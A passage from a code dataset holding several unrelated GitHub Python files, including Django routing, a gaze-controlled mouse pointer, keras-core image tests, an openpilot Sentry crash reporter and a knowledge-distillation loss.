phoneNumber, strategy_name, reminder_type):\n if (reminder_type == 'err'):\n reminder_type = '异常'\n else:\n pass\n content = (\"【道科技DaoTec】尊敬的客户您好!您运行的策略{}最新状态为{},\"\n \"更多信息请登录道科技。\").format(strategy_name, reminder_type)\n return sms_sender(nationCode, phoneNumber, content)\n\n\ndef main():\n pass\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"Maxwellpower1/fsb","sub_path":"dao_quote/dao_quote/util/verify/sms/send_sms.py","file_name":"send_sms.py","file_ext":"py","file_size_in_byte":2498,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"37931757611","text":"\"\"\"xiaohei URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/2.0/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n 1. Import the include() function: from django.urls import include, path\n 2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import url, include\nfrom rest_framework.routers import DefaultRouter\n\nfrom trade.views import OrderInfoViewSet,ShoppingCartViewSet,AliPayView,AliPayView2\n#\nrouter = DefaultRouter()\nrouter.register(r'tradeCart', OrderInfoViewSet, basename='tradeCart') # 订单信息\nrouter.register(r'ShopCart', ShoppingCartViewSet, basename='ShoppingCart') # 购物车\nrouter.register(r'AliPay', AliPayView, basename='AliPay')\n\nurlpatterns = [\n url(r'^', include(router.urls)),\n url(r'^ShoppingCart/$', ShoppingCartViewSet.as_view({'get': 'list'}),name='cartList' ), # 登录\n # url('^AliPay/$', AliPayView.as_view(), name='AliPay'), # 用户\n url(r'alipay/return/$',AliPayView2.as_view(),name='alipay')\n]\n","repo_name":"nieluyi/DjangoWeb","sub_path":"xiaohei/xiaohei/apps/trade/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1359,"program_lang":"python","lang":"en","doc_type":"code","stars":20,"dataset":"github-code","pt":"19"} +{"seq_id":"6898088335","text":"import cv2\r\nimport numpy as np\r\nimport dlib\r\nfrom math import hypot\r\nimport pyautogui\r\nimport time\r\n\r\ncap = cv2.VideoCapture(0)\r\n\r\ndetector = dlib.get_frontal_face_detector() # this only gets the position of face\r\npredictor = dlib.shape_predictor(\"shape_predictor_68_face_landmarks.dat\") # this gets the position of facial landmarks in our image\r\n\r\ndef midpoint(p1 ,p2):\r\n return int((p1.x + p2.x)/2), int((p1.y + p2.y)/2)\r\n\r\nfont = cv2.FONT_HERSHEY_PLAIN\r\n\r\ndef get_blinking_ratio(eye_points, facial_landmarks):\r\n '''This function draws a horizontal and a vertical line across the eye and returns ratio\r\n This is usefule for detecting if someone is blinking or not\r\n Here we have only used left eye as our reference. Sometimes it may happen that people with damaged eye \r\n can select the eye that they think would be useful for calibration'''\r\n left_point = (facial_landmarks.part(eye_points[0]).x, facial_landmarks.part(eye_points[0]).y)\r\n right_point = (facial_landmarks.part(eye_points[3]).x, facial_landmarks.part(eye_points[3]).y)\r\n center_top = midpoint(facial_landmarks.part(eye_points[1]), facial_landmarks.part(eye_points[2]))\r\n center_bottom = midpoint(facial_landmarks.part(eye_points[5]), facial_landmarks.part(eye_points[4]))\r\n\r\n #hor_line = cv2.line(frame, left_point, right_point, (0, 255, 0), 2)\r\n #ver_line = cv2.line(frame, center_top, center_bottom, (0, 255, 0), 2)\r\n\r\n hor_line_length = hypot((left_point[0] - right_point[0]), (left_point[1] - right_point[1]))\r\n ver_line_length = hypot((center_top[0] - center_bottom[0]), (center_top[1] - center_bottom[1]))\r\n\r\n ratio = hor_line_length / ver_line_length\r\n return ratio\r\n\r\ndef get_gaze_ratio(eye_points, facial_landmarks):\r\n left_eye_region = np.array([(facial_landmarks.part(eye_points[0]).x, facial_landmarks.part(eye_points[0]).y),\r\n (facial_landmarks.part(eye_points[1]).x, facial_landmarks.part(eye_points[1]).y),\r\n (facial_landmarks.part(eye_points[2]).x, facial_landmarks.part(eye_points[2]).y),\r\n (facial_landmarks.part(eye_points[3]).x, facial_landmarks.part(eye_points[3]).y),\r\n (facial_landmarks.part(eye_points[4]).x, facial_landmarks.part(eye_points[4]).y),\r\n (facial_landmarks.part(eye_points[5]).x, facial_landmarks.part(eye_points[5]).y)], np.int32)\r\n # cv2.polylines(frame, [left_eye_region], True, (0, 0, 255), 2)\r\n\r\n # This block deals with separating the eyes from the face\r\n height, width, _ = frame.shape\r\n mask = np.zeros((height, width), np.uint8)\r\n cv2.polylines(mask, [left_eye_region], True, 255, 2)\r\n cv2.fillPoly(mask, [left_eye_region], 255)\r\n eye = cv2.bitwise_and(gray, gray, mask=mask)\r\n\r\n min_x = np.min(left_eye_region[:, 0])\r\n max_x = np.max(left_eye_region[:, 0])\r\n min_y = np.min(left_eye_region[:, 1])\r\n max_y = np.max(left_eye_region[:, 1])\r\n \r\n ## Thesholding of the eye\r\n gray_eye = eye[min_y: max_y, min_x: max_x]\r\n #cv2.imshow(\"Eye\", gray_eye)\r\n _, threshold_eye = cv2.threshold(gray_eye, 70, 255, cv2.THRESH_BINARY)\r\n height, width = threshold_eye.shape\r\n\r\n ## The left and right sclera ratio. We can divide it further but the accuracy will decrease\r\n left_side_threshold = threshold_eye[0: height, 0: int(width / 2)]\r\n left_side_white = cv2.countNonZero(left_side_threshold)\r\n\r\n right_side_threshold = threshold_eye[0: height, int(width / 2): width]\r\n right_side_white = cv2.countNonZero(right_side_threshold)\r\n\r\n if left_side_white == 0:\r\n gaze_ratio = 1\r\n elif right_side_white == 0:\r\n gaze_ratio = 5\r\n else:\r\n gaze_ratio = left_side_white / right_side_white\r\n return gaze_ratio\r\n\r\nwhile True:\r\n _, frame = cap.read()\r\n new_frame = np.zeros((500, 500, 3), np.uint8)\r\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\r\n screen_x, screen_y = pyautogui.size()\r\n\r\n faces = detector(gray)\r\n for face in faces:\r\n x, y = face.left(), face.top()\r\n x1, y1 = face.right(), face.bottom()\r\n cv2.rectangle(frame, (x, y), (x1, y1), (0, 255, 0), 2)\r\n\r\n landmarks = predictor(gray, face)\r\n\r\n # Detect blinking\r\n left_eye_ratio = get_blinking_ratio([36, 37, 38, 39, 40, 41], landmarks)\r\n right_eye_ratio = get_blinking_ratio([42, 43, 44, 45, 46, 47], landmarks)\r\n blinking_ratio = (left_eye_ratio + right_eye_ratio) / 2\r\n\r\n if blinking_ratio > 5.7:\r\n if time.time() - prev_time < 1:\r\n pyautogui.click(x=screen_x-5,y=5)\r\n break\r\n cv2.putText(frame, \"BLINKING\", (100, 150), font, 7, (255, 0, 0))\r\n prev_time = time.time()\r\n print('Blinking')\r\n\r\n\r\n\t\t# Gaze detection\r\n '''This block will find the ratio of sclera and pupil for detection of gaze direction'''\r\n gaze_ratio_left_eye = get_gaze_ratio([36, 37, 38, 39, 40, 41], landmarks)\r\n gaze_ratio_right_eye = get_gaze_ratio([42, 43, 44, 45, 46, 47], landmarks)\r\n gaze_ratio = gaze_ratio_left_eye \r\n gaze_ratio = (gaze_ratio_right_eye + gaze_ratio_left_eye) / 2\r\n\r\n\r\n if gaze_ratio <= 1:\r\n cv2.putText(frame, \"RIGHT\", (50, 100), font, 2, (0, 0, 255), 3)\r\n pyautogui.moveTo(x = screen_x-5, y = screen_y-5)\r\n print('Right')\r\n elif 1 < gaze_ratio < 3:\r\n cv2.putText(frame, \"CENTER\", (50, 100), font, 2, (0, 0, 255), 3)\r\n pyautogui.moveTo(600, 300)\r\n print('Center')\r\n else:\r\n cv2.putText(frame, \"LEFT\", (50, 100), font, 2, (0, 0, 255), 3)\r\n pyautogui.moveTo(5,5)\r\n print('Left')\r\n\r\n cv2.imshow(\"Frame\", frame)\r\n\r\n key = cv2.waitKey(1)\r\n if key == 27:\r\n break\r\n\r\ncap.release()\r\ncv2.destroyAllWindows()","repo_name":"animeshsingh98/Unity_GUI","sub_path":"gaze_controlled_mousepointer.py","file_name":"gaze_controlled_mousepointer.py","file_ext":"py","file_size_in_byte":5881,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"43146502839","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\n\nclass Wav2Vec2ClassificationHead(nn.Module):\n \"\"\"Head for wav2vec classification task.\"\"\"\n\n def __init__(self, config):\n super().__init__()\n self.dense = nn.Linear(config[\"hidden_size\"], config[\"hidden_size\"])\n self.dropout = nn.Dropout(config[\"final_dropout\"])\n self.out_proj = nn.Linear(config[\"hidden_size\"], config[\"num_labels\"])\n\n def forward(self, features, return_feats, **kwargs):\n x = features\n x = self.dropout(x)\n x = self.dense(x)\n x = torch.tanh(x)\n x = self.dropout(x)\n if return_feats:\n return x\n x = self.out_proj(x)\n return x","repo_name":"adithya-tp/Low-Resource-SER-Experiments","sub_path":"GE2E/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"35146553129","text":"#install regex , pandas , numpy\r\nimport pandas as pd\r\nimport re\r\nimport numpy as np\r\nimport fortigate as ft\r\nimport server_access as sa\r\nimport cisco_asa as ca\r\n\r\n\r\ndef main():\r\n print(\"ENTER THE FILE LOCATION---->>\")\r\n location=input()\r\n print(\"ENTER THE TYPE OF LOG----->>\")\r\n print(\"1>SERVER_ACCESS,2>FORTIGATE300D,3>CISCO_ASA\")\r\n choice=int(input())\r\n print(\"ENTER THE DESTINATION LOCATION(enter 'NO' if excel not required---->\")\r\n location2=input()\r\n if choice==2:\r\n ft.parse_fortigate(location,location2)\r\n elif choice==1:\r\n sa.parse_server_access(location,location2)\r\n elif choice==3:\r\n ca.parse_cisco(location,location2)\r\n else:\r\n print(\"INVALID ARGUMENTS,PLEASE TRY AGAIN\")\r\n\r\nif __name__==\"__main__\":\r\n main()\r\n\r\n","repo_name":"aayushmahajan-123/complete_log_parser","sub_path":"LOG_PARSER.py","file_name":"LOG_PARSER.py","file_ext":"py","file_size_in_byte":787,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"32468846349","text":"import numpy as np\nimport pytest\nimport tensorflow as tf\nfrom absl.testing import parameterized\n\nfrom keras_core import backend\nfrom keras_core import testing\nfrom keras_core.backend.common.keras_tensor import KerasTensor\nfrom keras_core.ops import image as kimage\n\n\nclass ImageOpsDynamicShapeTest(testing.TestCase):\n def test_resize(self):\n x = KerasTensor([None, 20, 20, 3])\n out = kimage.resize(x, size=(15, 15))\n self.assertEqual(out.shape, (None, 15, 15, 3))\n\n x = KerasTensor([None, None, 3])\n out = kimage.resize(x, size=(15, 15))\n self.assertEqual(out.shape, (15, 15, 3))\n\n def test_affine_transform(self):\n x = KerasTensor([None, 20, 20, 3])\n transform = KerasTensor([None, 8])\n out = kimage.affine_transform(x, transform)\n self.assertEqual(out.shape, (None, 20, 20, 3))\n\n def test_extract_patches(self):\n x = KerasTensor([None, 20, 20, 3])\n p_h, p_w = 5, 5\n out = kimage.extract_patches(x, (p_h, p_w))\n self.assertEqual(out.shape, (None, 4, 4, 75))\n\n\nclass ImageOpsStaticShapeTest(testing.TestCase):\n def test_resize(self):\n x = KerasTensor([20, 20, 3])\n out = kimage.resize(x, size=(15, 15))\n self.assertEqual(out.shape, (15, 15, 3))\n\n def test_affine_transform(self):\n x = KerasTensor([20, 20, 3])\n transform = KerasTensor([8])\n out = kimage.affine_transform(x, transform)\n self.assertEqual(out.shape, (20, 20, 3))\n\n def test_extract_patches(self):\n x = KerasTensor([20, 20, 3])\n p_h, p_w = 5, 5\n out = kimage.extract_patches(x, (p_h, p_w))\n self.assertEqual(out.shape, (4, 4, 75))\n\n\nclass ImageOpsCorrectnessTest(testing.TestCase, parameterized.TestCase):\n @parameterized.parameters(\n [\n (\"bilinear\", True, \"channels_last\"),\n (\"nearest\", True, \"channels_last\"),\n (\"lanczos3\", True, \"channels_last\"),\n (\"lanczos5\", True, \"channels_last\"),\n (\"bicubic\", True, \"channels_last\"),\n (\"bilinear\", False, \"channels_last\"),\n (\"nearest\", False, \"channels_last\"),\n (\"lanczos3\", False, \"channels_last\"),\n (\"lanczos5\", False, \"channels_last\"),\n (\"bicubic\", False, \"channels_last\"),\n (\"bilinear\", True, \"channels_first\"),\n ]\n )\n def test_resize(self, interpolation, antialias, data_format):\n if backend.backend() == \"torch\":\n if \"lanczos\" in interpolation:\n self.skipTest(\n \"Resizing with Lanczos interpolation is \"\n \"not supported by the PyTorch backend. \"\n f\"Received: interpolation={interpolation}.\"\n )\n if interpolation == \"bicubic\" and antialias is False:\n self.skipTest(\n \"Resizing with Bicubic interpolation in \"\n \"PyTorch backend produces noise. Please \"\n \"turn on anti-aliasing. \"\n f\"Received: interpolation={interpolation}, \"\n f\"antialias={antialias}.\"\n )\n # Unbatched case\n if data_format == \"channels_first\":\n x = np.random.random((3, 50, 50)) * 255\n else:\n x = np.random.random((50, 50, 3)) * 255\n out = kimage.resize(\n x,\n size=(25, 25),\n interpolation=interpolation,\n antialias=antialias,\n data_format=data_format,\n )\n if data_format == \"channels_first\":\n x = np.transpose(x, (1, 2, 0))\n ref_out = tf.image.resize(\n x, size=(25, 25), method=interpolation, antialias=antialias\n )\n if data_format == \"channels_first\":\n ref_out = np.transpose(ref_out, (2, 0, 1))\n self.assertEqual(tuple(out.shape), tuple(ref_out.shape))\n self.assertAllClose(ref_out, out, atol=0.3)\n\n # Batched case\n if data_format == \"channels_first\":\n x = np.random.random((2, 3, 50, 50)) * 255\n else:\n x = np.random.random((2, 50, 50, 3)) * 255\n out = kimage.resize(\n x,\n size=(25, 25),\n interpolation=interpolation,\n antialias=antialias,\n data_format=data_format,\n )\n if data_format == \"channels_first\":\n x = np.transpose(x, (0, 2, 3, 1))\n ref_out = tf.image.resize(\n x, size=(25, 25), method=interpolation, antialias=antialias\n )\n if data_format == \"channels_first\":\n ref_out = np.transpose(ref_out, (0, 3, 1, 2))\n self.assertEqual(tuple(out.shape), tuple(ref_out.shape))\n self.assertAllClose(ref_out, out, atol=0.3)\n\n @parameterized.parameters(\n [\n (\"bilinear\", \"constant\", \"channels_last\"),\n (\"nearest\", \"constant\", \"channels_last\"),\n (\"bilinear\", \"nearest\", \"channels_last\"),\n (\"nearest\", \"nearest\", \"channels_last\"),\n (\"bilinear\", \"wrap\", \"channels_last\"),\n (\"nearest\", \"wrap\", \"channels_last\"),\n (\"bilinear\", \"reflect\", \"channels_last\"),\n (\"nearest\", \"reflect\", \"channels_last\"),\n (\"bilinear\", \"constant\", \"channels_first\"),\n ]\n )\n def test_affine_transform(self, interpolation, fill_mode, data_format):\n if fill_mode == \"wrap\" and backend.backend() == \"torch\":\n self.skipTest(\n \"Applying affine transform with fill_mode=wrap is not support\"\n \" in torch backend\"\n )\n if fill_mode == \"wrap\" and backend.backend() in (\"jax\", \"numpy\"):\n self.skipTest(\n \"The numerical results of applying affine transform with \"\n \"fill_mode=wrap in tensorflow is inconsistent with jax and \"\n \"numpy backends\"\n )\n\n # Unbatched case\n if data_format == \"channels_first\":\n x = np.random.random((3, 50, 50)) * 255\n else:\n x = np.random.random((50, 50, 3)) * 255\n transform = np.random.random(size=(6))\n transform = np.pad(transform, (0, 2)) # makes c0, c1 always 0\n out = kimage.affine_transform(\n x,\n transform,\n interpolation=interpolation,\n fill_mode=fill_mode,\n data_format=data_format,\n )\n if data_format == \"channels_first\":\n x = np.transpose(x, (1, 2, 0))\n ref_out = tf.raw_ops.ImageProjectiveTransformV3(\n images=tf.expand_dims(x, axis=0),\n transforms=tf.cast(tf.expand_dims(transform, axis=0), tf.float32),\n output_shape=tf.shape(x)[:-1],\n fill_value=0,\n interpolation=interpolation.upper(),\n fill_mode=fill_mode.upper(),\n )\n ref_out = ref_out[0]\n if data_format == \"channels_first\":\n ref_out = np.transpose(ref_out, (2, 0, 1))\n self.assertEqual(tuple(out.shape), tuple(ref_out.shape))\n if backend.backend() == \"torch\":\n # TODO: cannot pass with torch backend\n with self.assertRaises(AssertionError):\n self.assertAllClose(ref_out, out, atol=0.3)\n else:\n self.assertAllClose(ref_out, out, atol=0.3)\n\n # Batched case\n if data_format == \"channels_first\":\n x = np.random.random((2, 3, 50, 50)) * 255\n else:\n x = np.random.random((2, 50, 50, 3)) * 255\n transform = np.random.random(size=(2, 6))\n transform = np.pad(transform, [(0, 0), (0, 2)]) # makes c0, c1 always 0\n out = kimage.affine_transform(\n x,\n transform,\n interpolation=interpolation,\n fill_mode=fill_mode,\n data_format=data_format,\n )\n if data_format == \"channels_first\":\n x = np.transpose(x, (0, 2, 3, 1))\n ref_out = tf.raw_ops.ImageProjectiveTransformV3(\n images=x,\n transforms=tf.cast(transform, tf.float32),\n output_shape=tf.shape(x)[1:-1],\n fill_value=0,\n interpolation=interpolation.upper(),\n fill_mode=fill_mode.upper(),\n )\n if data_format == \"channels_first\":\n ref_out = np.transpose(ref_out, (0, 3, 1, 2))\n self.assertEqual(tuple(out.shape), tuple(ref_out.shape))\n if backend.backend() == \"torch\":\n # TODO: cannot pass with torch backend\n with self.assertRaises(AssertionError):\n self.assertAllClose(ref_out, out, atol=0.3)\n else:\n self.assertAllClose(ref_out, out, atol=0.3)\n\n @parameterized.parameters(\n [\n ((5, 5), None, 1, \"valid\", \"channels_last\"),\n ((3, 3), (2, 2), 1, \"valid\", \"channels_last\"),\n ((5, 5), None, 1, \"valid\", \"channels_first\"),\n ((3, 3), (2, 2), 1, \"valid\", \"channels_first\"),\n ((5, 5), None, 1, \"same\", \"channels_last\"),\n ((3, 3), (2, 2), 1, \"same\", \"channels_last\"),\n ((5, 5), None, 1, \"same\", \"channels_first\"),\n ((3, 3), (2, 2), 1, \"same\", \"channels_first\"),\n ((5, 5), (1, 1), 3, \"same\", \"channels_first\"),\n ((5, 5), (2, 2), 3, \"same\", \"channels_first\"),\n ((5, 5), (2, 2), 3, \"same\", \"channels_last\"),\n ]\n )\n def test_extract_patches(\n self, size, strides, dilation_rate, padding, data_format\n ):\n if (\n data_format == \"channels_first\"\n and backend.backend() == \"tensorflow\"\n ):\n pytest.skip(\"channels_first unsupported on CPU with TF\")\n\n if (\n isinstance(strides, tuple)\n and backend.backend() == \"tensorflow\"\n and dilation_rate > 1\n ):\n pytest.skip(\n \"dilation_rate>1 with strides>1 than not supported with TF\"\n )\n if data_format == \"channels_first\":\n image = np.random.uniform(size=(1, 3, 20, 20))\n else:\n image = np.random.uniform(size=(1, 20, 20, 3))\n patch_h, patch_w = size[0], size[1]\n if strides is None:\n strides_h, strides_w = patch_h, patch_w\n else:\n strides_h, strides_w = strides[0], strides[1]\n\n patches_out = kimage.extract_patches(\n backend.convert_to_tensor(image, dtype=\"float32\"),\n size=size,\n strides=strides,\n dilation_rate=dilation_rate,\n padding=padding,\n data_format=data_format,\n )\n if data_format == \"channels_first\":\n patches_out = backend.numpy.transpose(\n patches_out, axes=[0, 2, 3, 1]\n )\n if data_format == \"channels_first\":\n image = np.transpose(image, [0, 2, 3, 1])\n patches_ref = tf.image.extract_patches(\n image,\n sizes=(1, patch_h, patch_w, 1),\n strides=(1, strides_h, strides_w, 1),\n rates=(1, dilation_rate, dilation_rate, 1),\n padding=padding.upper(),\n )\n self.assertEqual(tuple(patches_out.shape), tuple(patches_ref.shape))\n self.assertAllClose(\n patches_ref.numpy(), backend.convert_to_numpy(patches_out), atol=0.3\n )\n","repo_name":"hertschuh/keras-core","sub_path":"keras_core/ops/image_test.py","file_name":"image_test.py","file_ext":"py","file_size_in_byte":11267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"19"} +{"seq_id":"670434363","text":"\"\"\" Dataclasses for Filetote representing Settings/Config-related content along with\ndata used in processing extra files/artifacts. \"\"\"\n\nfrom dataclasses import asdict, dataclass, field\nfrom sys import version_info\nfrom typing import Any, Dict, List, Optional, Union\n\nfrom beets.library import Library\nfrom beets.util import MoveOperation\n\nfrom .mapping_model import FiletoteMappingModel\n\nif version_info >= (3, 8):\n from typing import Literal\nelse:\n from typing_extensions import Literal # type: ignore # pylint: disable=import-error\n\n\n@dataclass\nclass FiletoteArtifact:\n \"\"\"An individual FileTote Artifact item for processing.\"\"\"\n\n path: str\n paired: bool\n\n\n@dataclass\nclass FiletoteArtifactCollection:\n \"\"\"An individual FileTote Item collection for processing.\"\"\"\n\n artifacts: List[FiletoteArtifact]\n mapping: FiletoteMappingModel\n source_path: str\n\n\n@dataclass\nclass FiletoteSessionData:\n \"\"\"Configuration settings for FileTote Item.\"\"\"\n\n operation: Optional[MoveOperation] = None\n beets_lib: Optional[Library] = None\n import_path: Optional[bytes] = None\n\n def adjust(self, attr: str, value: Any) -> None:\n \"\"\"Adjust provided attribute of class with provided value.\"\"\"\n setattr(self, attr, value)\n\n\n@dataclass\nclass FiletotePairingData:\n \"\"\"Configuration settings for FileTote Pairing.\"\"\"\n\n enabled: bool = False\n pairing_only: bool = False\n extensions: Union[Literal[\".*\"], List[str]] = \".*\"\n\n\n@dataclass\nclass FiletoteConfig:\n \"\"\"Configuration settings for FileTote Item.\"\"\"\n\n # pylint: disable=too-many-instance-attributes\n\n session: FiletoteSessionData = field(default_factory=FiletoteSessionData)\n extensions: Union[Literal[\"\"], List[str]] = \"\"\n filenames: Union[Literal[\"\"], List[str]] = \"\"\n patterns: Dict[str, List[str]] = field(default_factory=dict)\n exclude: Union[Literal[\"\"], List[str]] = \"\"\n pairing: FiletotePairingData = field(default_factory=FiletotePairingData)\n paths: Dict[str, str] = field(default_factory=dict)\n print_ignored: bool = False\n\n def asdict(self) -> dict: # type: ignore[type-arg]\n \"\"\"Returns a `dict` version of the dataclass.\"\"\"\n return asdict(self)\n\n def adjust(self, attr: str, value: Any) -> None:\n \"\"\"Adjust provided attribute of class with provided value. For the `pairing`\n property, use the `FiletotePairingData` dataclass and expand the incoming dict\n to arguments.\"\"\"\n if attr == \"pairing\":\n value = FiletotePairingData(**value)\n setattr(self, attr, value)\n","repo_name":"gtronset/beets-filetote","sub_path":"beetsplug/filetote_dataclasses.py","file_name":"filetote_dataclasses.py","file_ext":"py","file_size_in_byte":2571,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"19"} +{"seq_id":"27987473211","text":"\"\"\"Install exception handler for process crash.\"\"\"\nimport requests\nimport os\nimport sentry_sdk\nimport traceback\nfrom enum import Enum\nfrom sentry_sdk.integrations.threading import ThreadingIntegration\n\nfrom cereal import car\nfrom common.params import Params\nfrom datetime import datetime\nfrom selfdrive.athena.registration import is_registered_device\nfrom system.hardware import HARDWARE, PC\nfrom system.swaglog import cloudlog\nfrom system.version import get_branch, get_commit, get_origin, get_version, \\\n is_comma_remote, is_dirty, is_tested_branch\n\n\nclass SentryProject(Enum):\n # python project\n SELFDRIVE = \"https://5ad1714d27324c74a30f9c538bff3b8d@o4505034923769856.ingest.sentry.io/4505034930651136\"\n # native project\n SELFDRIVE_NATIVE = \"https://5ad1714d27324c74a30f9c538bff3b8d@o4505034923769856.ingest.sentry.io/4505034930651136\"\n\nCRASHES_DIR = '/data/community/crashes'\nret = car.CarParams.new_message()\ncandidate = ret.carFingerprint\nparams = Params()\ntry:\n dongle_id = params.get(\"DongleId\").decode('utf8')\nexcept AttributeError:\n dongle_id = \"None\"\ntry:\n updated = params.get(\"Updated\", encoding='utf-8')\nexcept Exception:\n updated = \"\"\ntry:\n installed = params.get(\"InstallDate\", encoding='utf-8')\nexcept Exception:\n installed = \"\"\nerror_tags = {'dongle_id': dongle_id, 'branch': get_branch(), 'remote': get_origin(), 'fingerprintedAs': candidate, 'updated': updated}\n\n\ndef report_tombstone(fn: str, message: str, contents: str) -> None:\n cloudlog.error({'tombstone': message})\n\n with sentry_sdk.configure_scope() as scope:\n scope.set_extra(\"tombstone_fn\", fn)\n scope.set_extra(\"tombstone\", contents)\n sentry_sdk.capture_message(message=message)\n sentry_sdk.flush()\n\n\ndef capture_exception(*args, **kwargs) -> None:\n save_exception(traceback.format_exc())\n cloudlog.error(\"crash\", exc_info=kwargs.get('exc_info', 1))\n\n try:\n sentry_sdk.capture_exception(*args, **kwargs)\n sentry_sdk.flush() # https://github.com/getsentry/sentry-python/issues/291\n except Exception:\n cloudlog.exception(\"sentry exception\")\n\ndef save_exception(exc_text):\n if not os.path.exists(CRASHES_DIR):\n os.makedirs(CRASHES_DIR)\n\n log_file = '{}/{}'.format(CRASHES_DIR, datetime.now().strftime('%m-%d-%Y--%I:%M.%S-%p.log'))\n log_file_2 = f'{CRASHES_DIR}/error.txt'\n with open(log_file, 'w') as f:\n f.write(exc_text)\n f.close()\n with open(log_file_2, 'w') as f2:\n f2.write(exc_text)\n f2.close()\n print('Logged current crash to {}'.format(log_file))\n\ndef bind_user(**kwargs) -> None:\n sentry_sdk.set_user(kwargs)\n sentry_sdk.flush()\n\ndef capture_warning(warning_string):\n bind_user(id=dongle_id)\n sentry_sdk.capture_message(warning_string, level='warning')\n sentry_sdk.flush()\n\ndef capture_info(info_string):\n bind_user(id=dongle_id)\n sentry_sdk.capture_message(info_string, level='info')\n sentry_sdk.flush()\n\ndef set_tag(key: str, value: str) -> None:\n sentry_sdk.set_tag(key, value)\n sentry_sdk.flush()\n\n\ndef init(project: SentryProject) -> None:\n # forks like to mess with this, so double check\n comma_remote = is_comma_remote() and \"FrogAi\" in get_origin(default=\"\")\n if not comma_remote or not is_registered_device() or PC:\n return\n\n env = \"release\" if is_tested_branch() else \"master\"\n dongle_id = Params().get(\"DongleId\", encoding='utf-8')\n updated = params.get(\"Updated\", encoding='utf-8')\n installed = params.get(\"InstallDate\", encoding='utf-8')\n\n integrations = []\n if project == SentryProject.SELFDRIVE:\n integrations.append(ThreadingIntegration(propagate_hub=True))\n else:\n sentry_sdk.utils.MAX_STRING_LENGTH = 8192\n\n sentry_sdk.init(project.value,\n default_integrations=False,\n release=get_version(),\n integrations=integrations,\n traces_sample_rate=1.0,\n environment=env)\n\n sentry_sdk.set_user({\"id\": dongle_id})\n sentry_sdk.set_tag(\"origin\", get_origin())\n sentry_sdk.set_tag(\"branch\", get_branch())\n sentry_sdk.set_tag(\"commit\", get_commit())\n sentry_sdk.set_tag(\"updated\", updated)\n sentry_sdk.set_tag(\"installed\", installed)\n\n if project == SentryProject.SELFDRIVE:\n sentry_sdk.Hub.current.start_session()\n","repo_name":"iambluefred/FrogPilot","sub_path":"selfdrive/sentry.py","file_name":"sentry.py","file_ext":"py","file_size_in_byte":4223,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"74232913643","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom .basic_distiller import BasicDistiller\n\ndef dkd_loss(logits_student, logits_teacher, target, alpha, beta, temperature):\n gt_mask = _get_gt_mask(logits_student, target)\n other_mask = _get_other_mask(logits_student, target)\n pred_student = F.softmax(logits_student / temperature, dim=1)\n pred_teacher = F.softmax(logits_teacher / temperature, dim=1)\n pred_student = cat_mask(pred_student, gt_mask, other_mask)\n pred_teacher = cat_mask(pred_teacher, gt_mask, other_mask)\n log_pred_student = torch.log(pred_student)\n tckd_loss = (\n F.kl_div(log_pred_student, pred_teacher, size_average=False)\n * (temperature**2)\n / target.shape[0]\n )\n pred_teacher_part2 = F.softmax(\n logits_teacher / temperature - 1000.0 * gt_mask, dim=1\n )\n log_pred_student_part2 = F.log_softmax(\n logits_student / temperature - 1000.0 * gt_mask, dim=1\n )\n nckd_loss = (\n F.kl_div(log_pred_student_part2, pred_teacher_part2, size_average=False)\n * (temperature**2)\n / target.shape[0]\n )\n return alpha * tckd_loss + beta * nckd_loss\n\n\ndef _get_gt_mask(logits, target):\n target = target.reshape(-1)\n mask = torch.zeros_like(logits).scatter_(1, target.unsqueeze(1), 1).bool()\n return mask\n\n\ndef _get_other_mask(logits, target):\n target = target.reshape(-1)\n mask = torch.ones_like(logits).scatter_(1, target.unsqueeze(1), 0).bool()\n return mask\n\n\ndef cat_mask(t, mask1, mask2):\n t1 = (t * mask1).sum(dim=1, keepdims=True)\n t2 = (t * mask2).sum(1, keepdims=True)\n rt = torch.cat([t1, t2], dim=1)\n return rt\n\n\nclass DKD(BasicDistiller):\n \"\"\"Decoupled Knowledge Distillation(CVPR 2022)\"\"\"\n def __init__(self, pretrained_model, alpha, beta, temperature, warmup, is_frozen=True, use_saved_logits=True, topk=0, num_classes=10, teacher_type=None):\n ''' Init method.\n\n :param pretrained_model: the pretrained model as teacher\n :param alpha: the alpha for DKD \n :param beta: the beta for DKD \n :param temperature: the temperature for DKD \n :param warmup: warmup epoches for DKD\n :param is_frozen: whether frozen teacher when training\n :param use_saved_logits: whether train with pre-saved logits\n :param topk: if use logits, save top k logits, 0 means save all logits\n :param num_classes: num of classification classes\n :param teacher_type: teacher model type\n '''\n super(DKD, self).__init__(pretrained_model, is_frozen, use_saved_logits, topk, num_classes, teacher_type)\n self.alpha = alpha\n self.beta = beta\n self.temperature = temperature\n self.warmup = warmup\n\n def loss(self,teacher_logits, student_logits,**kwargs):\n ''' Loss function.\n\n :param teacher_logits: the teacher logits\n :param student_logits: the student logits\n '''\n distiller_loss = min(kwargs[\"epoch\"] / self.warmup, 1.0) * dkd_loss(\n student_logits, teacher_logits,kwargs[\"target\"],\n self.alpha, self.beta, self.temperature,)\n return 